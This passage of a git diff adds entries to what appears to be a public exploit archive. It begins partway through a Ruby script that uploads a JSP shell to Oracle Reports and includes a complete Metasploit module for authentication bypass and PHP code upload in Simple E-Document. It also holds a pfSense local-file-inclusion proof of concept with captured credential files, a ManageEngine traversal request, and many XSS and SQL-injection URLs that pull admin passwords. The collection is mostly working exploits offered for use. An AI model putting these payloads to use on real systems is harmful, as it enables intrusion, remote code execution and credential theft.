+test = html.scan(/<SPAN class=OraInstructionText>(.*)<\/SPAN><\/TD>/).flatten
+
+#Parse keymaps for servers
+print "[*] Enumerating keymaps ... \n"
+test.each do |t|
+  if not @hacked
+    t = t.delete(' ')
+    url = "#{@url}/reports/rwservlet/parsequery?#{t}"
+
+  begin
+    uri = URI.parse(url)
+    html = uri.open.read
+    rescue
+  end
+  
+  #to automate exploitation we need to query showenv for a local path
+  #we need a server id and creds for this, we enumerate the keymaps and hope for the best
+  #showenv tells us the local PATH of /reports/ where we upload the shell
+  #so we can reach it from /reports/images/<shell>.jsp 
+
+  if html =~ /userid=(.*)@/
+    authid = $1
+  end
+  if html =~ /server=(\S*)/ 
+    server = $1
+  end
+
+  if server and authid
+    getenv(server, authid)
+  end
+  else
+    break
+  end
+end
+
+if @hacked
+  print "[*] Server hopefully compromised!\n"
+  print "[*] Payload url: #{@url}/reports/images/#{@payload_name}\n"
+else
+  print "[*] Enumeration done ... no vulnerable keymaps for automatic explotation found :(\n"
+  #server is still vulnerable but cannot be automatically exploited ... i guess
+end
\ No newline at end of file
diff --git a/platforms/multiple/remote/31279.txt b/platforms/multiple/remote/31279.txt
new file mode 100755
index 000000000..09b09e358
--- /dev/null
+++ b/platforms/multiple/remote/31279.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27925/info
+
+IBM Lotus Quickr is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Lotus Quickr 8.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/main.nsf/h_Toc/2a922d48c75dd00b052567080016723a/?OpenDocument&Count='20"><iframe/%20/onload=alert(/XSSByNirG/<http://www.example.com/QuickPlace/leg/main.nsf/h_Toc/2a922d48c75dd00b052567080016723a/?OpenDocument&Count='20%22%3E%3Ciframe/%20/onload=alert(/XSSByNirG/>)> 
\ No newline at end of file
diff --git a/platforms/php/remote/31264.rb b/platforms/php/remote/31264.rb
new file mode 100755
index 000000000..951f80038
--- /dev/null
+++ b/platforms/php/remote/31264.rb
@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Simple E-Document Arbitrary File Upload",
+      'Description'    => %q{
+        This module exploits a file upload vulnerability found in Simple
+        E-Document versions 3.0 to 3.1. Attackers can bypass authentication and
+        abuse the upload feature in order to upload malicious PHP files which
+        results in arbitrary remote code execution as the web server user. File
+        uploads are disabled by default.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'vinicius777[at]gmail.com', # Auth bypass discovery and PoC, kinda
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'References'     =>
+        [
+          # This EDB uses SQLI for auth bypass which isn't needed.
+          # Sending "Cookie: access=3" with all requests is all
+          # that's needed for auth bypass.
+          ['EDB', '31142']
+        ],
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          # Arbitrary big number. The payload gets sent as an HTTP
+          # response body, so really it's unlimited
+          'Space'       => 262144 # 256k
+        },
+      'Arch'           => ARCH_PHP,
+      'Platform'       => 'php',
+      'Targets'        =>
+        [
+          # Tested on Simple E-Document versions 3.0 and 3.1
+          [ 'Generic (PHP Payload)', {} ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Jan 23 2014',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path to Simple E-Document', '/simple_e_document_v_1_31/'])
+        ], self.class)
+  end
+
+  #
+  # Checks if target allows file uploads
+  #
+  def check
+    res = send_request_raw({
+      'uri'    => normalize_uri(target_uri.path, 'upload.php'),
+      'cookie' => 'access=3'
+    })
+
+    unless res
+      vprint_error("#{peer} - Connection timed out")
+      return Exploit::CheckCode::Unknown
+    end
+
+    if res.body and res.body.to_s =~ /File Uploading Has Been Disabled/
+      vprint_error("#{peer} - File uploads are disabled")
+      return Exploit::CheckCode::Safe
+    end
+
+    if res.body and res.body.to_s =~ /Upload File/
+      return Exploit::CheckCode::Appears
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  #
+  # Uploads our malicious file
+  #
+  def upload
+    @fname = "#{rand_text_alphanumeric(rand(10)+6)}.php"
+    php  = "<?php #{payload.encoded} ?>"
+
+    data = Rex::MIME::Message.new
+    data.add_part('upload', nil, nil, 'form-data; name="op1"')
+    data.add_part(php, 'application/octet-stream', nil, "form-data; name=\"fileupload\"; filename=\"#{@fname}\"")
+    post_data = data.to_s.gsub(/^\r\n--_Part_/, '--_Part_')
+
+    print_status("#{peer} - Uploading malicious file...")
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'upload.php'),
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'cookie'   => 'access=3',
+      'data'     => post_data,
+      'vars_get' => {
+        'op' => 'newin'
+      }
+    })
+
+    fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading") unless res
+    fail_with(Failure::NotFound, "#{peer} - No upload.php found") if res.code.to_i == 404
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to write #{@fname}") if res.body and (res.body =~ /Couldn't copy/ or res.body !~ /file uploaded\!/)
+
+    print_good("#{peer} - Payload uploaded successfully.")
+    register_files_for_cleanup(@fname)
+
+    if res.body.to_s =~ /<br>folder to use: .+#{target_uri.path}\/?(.+)<br>/
+        @upload_path = normalize_uri(target_uri.path, "#{$1}")
+        print_good("#{peer} - Found upload path #{@upload_path}")
+    else
+        @upload_path = normalize_uri(target_uri.path, 'in')
+        print_warning("#{peer} - Could not find upload path - assuming '#{@upload_path}'")
+    end
+  end
+
+  #
+  # Executes our uploaded malicious file
+  #
+  def exec
+    print_status("#{peer} - Executing #{@fname}...")
+    res = send_request_raw({
+      'uri'    => normalize_uri(@upload_path, @fname),
+      'cookie' => 'access=3'
+    })
+    if res and res.code == 404
+      fail_with(Failure::NotFound, "#{peer} - Not found: #{@fname}")
+    end
+  end
+
+  #
+  # Just upload and execute
+  #
+  def exploit
+    upload
+    exec
+  end
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/31262.txt b/platforms/php/webapps/31262.txt
new file mode 100755
index 000000000..170e7744b
--- /dev/null
+++ b/platforms/php/webapps/31262.txt
@@ -0,0 +1,62 @@
+-----------
+Author:
+-----------
+
+xistence < xistence[at]0x90[.]nl >
+
+-------------------------
+Affected products:
+-------------------------
+
+ManageEngine Support Center Plus 7916 and lower
+
+-------------------------
+Affected vendors:
+-------------------------
+
+ManageEngine
+http://www.manageengine.com/
+
+-------------------------
+Product description:
+-------------------------
+
+SupportCenter Plus is a web-based customer support software that lets
+organizations effectively manage customer tickets,
+their account & contact information, the service contracts and in the
+process providing a superior customer experience.
+
+----------
+Details:
+----------
+
+[ 0x01 - Directory Traversal ]
+
+Support Center Plus 7916 and lower is prone to a directory traversal
+vulnerability. When creating a ticket and attaching
+a file, this can be tampered to link to a local file on the server side.
+By downloading the attachment from the ticket, the server file is
+downloaded with the same privileges as the
+Support Center Plus instance, which on windows is SYSTEM. On linux Support
+Center Plus is mostly installed as the root user.
+
+POST parameters when submitting a ticket to the /WorkOrder.do url and
+attaching the server /etc/passwd:
+
+category=&MOD_IND=WorkOrder&attachments=passwd&subCategory=0&addWO=addWO&title=pwned&attPath=
+&component=Request&reqTemplate=&reqName=Guest&priority=2&item=0&reqID=2&attSize=31337&autoCCList=
+&FORMNAME=WorkOrderForm&usertypename=Requester
+&attach=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&prodId=0&description=pwned
+
+
+-----------
+Solution:
+-----------
+
+Upgrade to a build higher than 7916.
+
+--------------
+Timeline:
+--------------
+
+Fixed somewhere back in 2013 :)
\ No newline at end of file
diff --git a/platforms/php/webapps/31263.txt b/platforms/php/webapps/31263.txt
new file mode 100755
index 000000000..fdeacde53
--- /dev/null
+++ b/platforms/php/webapps/31263.txt
@@ -0,0 +1,223 @@
+######################################################################
+#  _     ___  _   _  ____  ____    _  _____
+#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
+#  | |  | | | |  \| | |  _| |     / _ \ | |
+#  | |__| |_| | |\  | |_| | |___ / ___ \| |
+#  |_____\___/|_| \_|\____|\____/_/   \_\_|
+#
+# Exploit Title: pfSense 2.1 Privilege Escalation from less privileged
+users (LFI/RCE)
+# Date: 25/01/2014 (0-day)
+# Exploit Author: @u0x (Pichaya Morimoto)
+# Software Link: www.pfsense.org
+# Category: Local File Inclusion (LFI) & Privilege Escalation
+# Version: pfSense 2.1 build 20130911-1816 with snort 2.9.5.5 pkg v.3.0.2
+#
+#####################################################################
+
+
+
+pfSense firewall/router distribution description :
+
+======================================================================
+
+pfSense is a free, open source customized distribution of FreeBSD tailored
+for use as a firewall and router. In addition to being a powerful, flexible
+firewalling and routing platform, it includes a long list of related
+features and a package system allowing further expandability without adding
+bloat and potential security vulnerabilities to the base distribution.
+pfSense is a popular project with more than 1 million downloads since its
+inception, and proven in countless installations ranging from small home
+networks protecting a PC and an Xbox to large corporations, universities
+and other organizations protecting thousands of network devices.
+
+This project started in 2004 as a fork of the m0n0wall project, but focused
+towards full PC installations rather than the embedded hardware focus of
+m0n0wall. pfSense also offers an embedded image for Compact Flash based
+installations, however it is not our primary focus.
+
+Attack Scenario
+
+======================================================================
+
+Authenticated users with only permission to access some packages in web gui
+(a.k.a. webConfigurator) will be able to escalate themselves to other
+privileged admin by reading /conf/config.xml file through bugs (i.e. Snort
+LFI), result in fully compromise the pfSense.
+
+This attack abuse the user privilege scheme with some of official packages
+(System > Package Manager)
+
+* Session Hijacking also possible to steal less privileged user sessions to
+perform this trick  due to "http" admin by default webConfigurator.
+
+Sample bug #1 : Snort Admin Privilege Escalation via Local File Inclusion
+Vulnerability
+
+Vulnerable file:
+
+======================================================================
+
+snort_log_view.php
+
+[+] Checksum
+SHA1: ec1330e804eb028f2410c8ef9439df103bb2764c
+MD5: cd767e46a4e9e09ede7fd26560e37f14
+
+Vulnerable Source Code :
+======================================================================
+http://www.pfsense.com/packages/config/snort/snort_log_view.php
+https://github.com/pfsense/pfsense-packages/blob/master/config/snort/snort_log_view.php
+
+…(deducted)...
+
+$contents = '';
+// Read the contents of the argument passed to us.
+// Is it a fully qualified path and file?
+
+if (file_exists($_GET['logfile']))
+       $contents = file_get_contents($_GET['logfile']);
+// It is not something we can display, so print an error.
+else
+       $contents = gettext("\n\nERROR -- File: {$_GET['logfile']} not
+found!");
+$pgtitle = array(gettext("Snort"), gettext("Log File Viewer"));
+?>
+
+…(deducted)...
+<textarea style="width:100%; height:100%;" readonly wrap="off" rows="33"
+cols="80" name="code2"><?=$contents;?>&lt;/textarea&gt;
+…(deducted)...
+
+
+
+Proof of Concept 1 : Arbitrary File Inclusion
+======================================================================
+
+GET /snort/snort_log_view.php?logfile=/etc/passwd HTTP/1.1
+Host: firewall1.pentestlab1:1337
+Connection: keep-alive
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: th,en-US;q=0.8,en;q=0.6
+Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
+
+HTTP/1.1 200 OK
+Expires: Mon, 27 Jan 2014 07:25:10 GMT
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: max-age=180000
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
+pre-check=0
+Last-Modified: Sat, 25 Jan 2014 05:25:10 GMT
+X-Frame-Options: SAMEORIGIN
+Pragma: no-cache
+Content-type: text/html
+Transfer-Encoding: chunked
+Date: Sat, 25 Jan 2014 05:25:10 GMT
+Server: lighttpd/1.4.32
+
+…(deducted)...
+<td colspan="2" valign="top" class="label">
+           <div style="background: #eeeeee; width:100%; height:100%;"
+id="textareaitem"><!-- NOTE: The opening *and* the closing textarea tag
+must be on the same line. -->
+           <textarea style="width:100%; height:100%;" readonly wrap="off"
+rows="33" cols="80" name="code2">root:*:0:0:Charlie &:/root:/bin/sh
+toor:*:0:0:Bourne-again Superuser:/root:
+daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
+operator:*:2:5:System &:/:/usr/sbin/nologin
+…(deducted)...
+havp:*:1003:2000:havp daemon:/nonexistent:/sbin/nologin
+squid:*:100:100:squid caching-proxy pseudo user:/var/squid:/usr/sbin/nologin
+c_icap:*:959:959:c-icap daemon:/var/empty:/usr/sbin/nologin
+snortadmin:*:2000:65534:Bill Gates:/home/snortadmin:/sbin/nologin
+…(deducted)...
+
+Proof of Concept 2 : Directory Traversal
+# This trick works on PHP 5.3.27 with Suhosin-Patch (cgi-fcgi) +
+Lighttpd/1.4.32 on FreeBSD 8.3 x64
+======================================================================
+
+GET /snort/snort_log_view.php?logfile=../ HTTP/1.1
+Host: firewall1.pentestlab1:1337
+Connection: keep-alive
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: th,en-US;q=0.8,en;q=0.6
+Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
+
+…(deducted)...
+¬p.Z..­p firewall_rules_edit.php®p
+xmlrpc.php¯p
+wizard.php°p
+vpn_pptp_users_edit.php±pvpn_pptp_users.php²pvpn_pptp.php³pvpn_pppoe_edit.php´p
+vpn_pppoe.phpµp vpn_openvpn_server.php¶pvpn_openvpn_csc.php·p
+vpn_openvpn_client.php¸p
+vpn_l2tp_users_edit.php¹pvpn_l2tp_users.phpºpvpn_l2tp.php»p
+vpn_ipsec_phase2.php¼p vpn_ipsec_phase1.php½p(vpn_ipsec_mobile.php¾p
+vpn_ipsec_keys_edit.php¿pvpn_ipsec_keys.phpÀp
+vpn_ipsec.phpÁpuploadconfig.phpÂptreeview.cssÃpwizardsÏp
+tree-imagesÛp0$system_usermanager_settings_test.phpÜp8,system_usermanager_settings_ldapacpicker.phpÿÿÿÝp(system_usermanager_settings.phpÞp,!
+…(deducted)...
+
+Proof of Concept 3 : Privilege Escalation
+# -rw-r--r--  root wheel 30k Jan 25 11:35 config.xml
+======================================================================
+
+GET /snort/snort_log_view.php?logfile=/conf/config.xml HTTP/1.1
+Host: firewall1.pentestlab1:1337
+Connection: keep-alive
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Encoding: gzip,deflate,sdch
+Accept-Language: th,en-US;q=0.8,en;q=0.6
+Cookie: PHPSESSID=980de3bdd73f6bc4728b0dca854de258; cookie_test=1390628083
+
+…(deducted)...
+<group>
+           <name>office</name>
+           <description><![CDATA[Main Office Employees]]></description>
+           <member>2000</member>
+           <gid>2000</gid>
+       </group>
+       <user>
+           <name>admin</name>
+           <descr><![CDATA[System Administrator]]></descr>
+           <scope>system</scope>
+           <groupname>admins</groupname>
+           <password>$1$y8KiO3ow$mmMX4R0hE…(deducted)...</password>
+           <uid>0</uid>
+           <priv>user-shell-access</priv>
+           <md5-hash>d4383b6f4c9fa…(deducted)...</md5-hash>
+<nt-hash>356239666432306265376131653…(deducted)...</nt-hash>
+       </user>
+…(deducted)...
+
+P.S. There are many other ways to escalate from less-privileged users using
+official packages.
+For example, some OS command injections (Feel free to dig deeper than me..
+LoL)
+
+arping/arping.inc:38:   system("arping -c3 " . $_POST['hostip']);
+tinc/tinc.inc:173:                                mwexec("/sbin/ifconfig
+{$realif} -group " . $a_ifgroups[$_GET['id']]['ifname']);
+spamd/spamd_db_ext.php:57:exec("echo {$_GET['action']} > /tmp/tmp");
+spamd/spamd_db.php:106: $status = exec("/usr/local/sbin/spamdb | grep
+\"{$_GET['getstatus']}\"");
+freeswitch_dev/v_profiles.tmp:38:       exec("cp
+".$v_conf_dir.".orig/sip_profiles/".$_GET['f']."
+".$v_conf_dir."/sip_profiles/".$_GET['f']);
+freeswitch_dev/v_profiles.tmp:60:                       exec("rm
+".$v_conf_dir."/sip_profiles/".$_GET['f']);
+snort-dev/snortsam-package-code/snort_new.inc:112:
+exec("/bin/ln -s
+/usr/local/etc/snort/snortDBrules/DB/{$_POST['ruledbname']}/rules
+{$pathToSnortDir}/{$newSnortDir}/rules");
+snort-dev/snortsam-package-code/snort_new.inc:129:
+$sidLinePosPre = exec('/usr/bin/sed -n /sid:' . $_POST['snortSidNum'] .
+'\;/= ' . $workingFile);
+
+# Special Thanks : Xelenonz, pistachio, pe3z and 2600 Thailand.
+# Video PoC (Thai version) : https://www.youtube.com/watch?v=dGwOUccGZnE
\ No newline at end of file
diff --git a/platforms/php/webapps/31265.txt b/platforms/php/webapps/31265.txt
new file mode 100755
index 000000000..cb8b89af0
--- /dev/null
+++ b/platforms/php/webapps/31265.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27898/info
+
+Spyce is prone to multiple input-validation vulnerabilities that can lead to information disclosure or client-side script execution.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can also obtain a server's webroot path.
+
+The issues affect Spyce 2.1.3; other versions may also be vulnerable. 
+
+http://www.example.com/docs/examples/redirect.spy?url=%3CSCRIPT%3Ealert('Can%20Cross%20Site%20Attack')%3C/SCRIPT%3E&type=internal
\ No newline at end of file
diff --git a/platforms/php/webapps/31266.txt b/platforms/php/webapps/31266.txt
new file mode 100755
index 000000000..54e5ffddc
--- /dev/null
+++ b/platforms/php/webapps/31266.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27898/info
+ 
+Spyce is prone to multiple input-validation vulnerabilities that can lead to information disclosure or client-side script execution.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can also obtain a server's webroot path.
+ 
+The issues affect Spyce 2.1.3; other versions may also be vulnerable. 
+
+http://www.example.com/docs/examples/handlervalidate.spy?x="><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>
\ No newline at end of file
diff --git a/platforms/php/webapps/31267.txt b/platforms/php/webapps/31267.txt
new file mode 100755
index 000000000..587bcb435
--- /dev/null
+++ b/platforms/php/webapps/31267.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27898/info
+  
+Spyce is prone to multiple input-validation vulnerabilities that can lead to information disclosure or client-side script execution.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can also obtain a server's webroot path.
+  
+The issues affect Spyce 2.1.3; other versions may also be vulnerable. 
+
+http://www.example.com/spyce/examples/request.spy?name="/><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>
\ No newline at end of file
diff --git a/platforms/php/webapps/31268.txt b/platforms/php/webapps/31268.txt
new file mode 100755
index 000000000..3861c01eb
--- /dev/null
+++ b/platforms/php/webapps/31268.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27898/info
+   
+Spyce is prone to multiple input-validation vulnerabilities that can lead to information disclosure or client-side script execution.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can also obtain a server's webroot path.
+   
+The issues affect Spyce 2.1.3; other versions may also be vulnerable. 
+
+http://www.example.com/spyce/examples/getpost.spy?Name="/><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>
\ No newline at end of file
diff --git a/platforms/php/webapps/31269.txt b/platforms/php/webapps/31269.txt
new file mode 100755
index 000000000..1c1606cf8
--- /dev/null
+++ b/platforms/php/webapps/31269.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27898/info
+    
+Spyce is prone to multiple input-validation vulnerabilities that can lead to information disclosure or client-side script execution.
+    
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can also obtain a server's webroot path.
+    
+The issues affect Spyce 2.1.3; other versions may also be vulnerable. 
+
+http://www.example.com/spyce/examples/formtag.spy?="/><SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>&foo=Submit!&mycheck=check1&mypass=secret&myradio=radio_option1&mytext=some&mytextarea=&lt;/textarea&gt;<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT>
+http://www.example.com/spyce/examples/formtag.spy?mypass=%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/31270.txt b/platforms/php/webapps/31270.txt
new file mode 100755
index 000000000..6c968731f
--- /dev/null
+++ b/platforms/php/webapps/31270.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27898/info
+     
+Spyce is prone to multiple input-validation vulnerabilities that can lead to information disclosure or client-side script execution.
+     
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. The attacker can also obtain a server's webroot path.
+     
+The issues affect Spyce 2.1.3; other versions may also be vulnerable. 
+
+Requesting the following URL returns the server's webroot:
+http://www.example.com/spyce/examples/automaton.spy 
\ No newline at end of file
diff --git a/platforms/php/webapps/31272.txt b/platforms/php/webapps/31272.txt
new file mode 100755
index 000000000..38b8b4297
--- /dev/null
+++ b/platforms/php/webapps/31272.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27921/info
+
+The Joomla! and Mambo 'com_joomlavvz' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999+union/**/select+0x3a,0x3a,password,0,0,0,0,0,0,0,0,0x3a,0x3a,0x3a,0x3a,username/**/from/**/jos_users/* 
\ No newline at end of file
diff --git a/platforms/php/webapps/31273.txt b/platforms/php/webapps/31273.txt
new file mode 100755
index 000000000..2fb11313f
--- /dev/null
+++ b/platforms/php/webapps/31273.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27922/info
+
+The Joomla! and Mambo 'com_most' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_most&mode=email&secid=-9999999/**/union/**/select/**/0000,concat(username,0x3a,password),2222,3333/**/from/**/jos_users/* 
\ No newline at end of file
diff --git a/platforms/php/webapps/31274.txt b/platforms/php/webapps/31274.txt
new file mode 100755
index 000000000..6559689f6
--- /dev/null
+++ b/platforms/php/webapps/31274.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27923/info
+
+The Joomla! and Mambo 'com_asortyment' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_asortyment&Itemid=36&lang=pl&task=kat&katid=-9999999/**/union/**/select/**/0x3a,concat(username,0x3a,password),concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/* 
\ No newline at end of file
diff --git a/platforms/php/webapps/31277.txt b/platforms/php/webapps/31277.txt
new file mode 100755
index 000000000..e40321dbd
--- /dev/null
+++ b/platforms/php/webapps/31277.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27924/info
+  
+Aeries Student Information System is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue, because it fails to sufficiently sanitize user-supplied data.
+  
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+  
+These issues affect Aeries Student Information System 3.8.2.8 and 3.7.2.2; other versions may also be affected.
+ 
+http://www.example.com/ClassList.asp&Term=SQL
\ No newline at end of file
diff --git a/platforms/php/webapps/31278.txt b/platforms/php/webapps/31278.txt
new file mode 100755
index 000000000..a7bff689c
--- /dev/null
+++ b/platforms/php/webapps/31278.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27924/info
+   
+Aeries Student Information System is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue, because it fails to sufficiently sanitize user-supplied data.
+   
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+   
+These issues affect Aeries Student Information System 3.8.2.8 and 3.7.2.2; other versions may also be affected.
+
+http://www.example.com/GradebookStuScores.asp?GrdBk=SQL 
\ No newline at end of file
diff --git a/platforms/php/webapps/31280.txt b/platforms/php/webapps/31280.txt
new file mode 100755
index 000000000..ef84b97ff
--- /dev/null
+++ b/platforms/php/webapps/31280.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/27926/info
+
+The Joomla! and Mambo Referenzen component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_referenzen&Itemid=7&detail=-9999999+union/**/select/**/0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,concat(user
+name,0x3a,password),0,0,0,0,0/**/from/**/jos_users/* 
\ No newline at end of file
diff --git a/platforms/php/webapps/31281.txt b/platforms/php/webapps/31281.txt
new file mode 100755
index 000000000..aa68f4d54
--- /dev/null
+++ b/platforms/php/webapps/31281.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27930/info
+
+The Classifieds module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/modules.php?name=Classifieds&mode=Details&id=-0000/**/union+select/**/000,111,222,000,aid,5,6,pwd,8,9,10,11/**/from/**/nuke_authors/*where%20admin%202%20-4 
\ No newline at end of file
diff --git a/platforms/php/webapps/31282.txt b/platforms/php/webapps/31282.txt
new file mode 100755
index 000000000..ff7a8d1d3
--- /dev/null
+++ b/platforms/php/webapps/31282.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27931/info
+
+Tiny Event is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects Tiny Event 1.01; other versions may also be vulnerable. 
+
+http://www.example.com/modules/tinyevent/index.php?op=print&id=-0/**/union/**/select+0x3a,0x3a,0x3a,uname,pass+from/**/xoops_users/*where%20admin%201%200%2066 
\ No newline at end of file
diff --git a/platforms/php/webapps/31283.txt b/platforms/php/webapps/31283.txt
new file mode 100755
index 000000000..456118019
--- /dev/null
+++ b/platforms/php/webapps/31283.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27932/info
+
+The Downloads module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,aid/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201%200%202
+http://www.example.com/modules.php?name=Downloads&d_op=viewsdownload&sid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/3333,pwd/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201%200%202
+
diff --git a/platforms/php/webapps/31284.txt b/platforms/php/webapps/31284.txt
new file mode 100755
index 000000000..4b7a1886f
--- /dev/null
+++ b/platforms/php/webapps/31284.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27934/info
+
+XOOPS 'prayerlist' module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/modules/prayerlist/index.php?pa=view&cid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass)/**/from/**/xoops_users/* 
\ No newline at end of file
diff --git a/platforms/php/webapps/31287.txt b/platforms/php/webapps/31287.txt
new file mode 100755
index 000000000..eaa66e618
--- /dev/null
+++ b/platforms/php/webapps/31287.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27955/info
+
+The Recipe module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
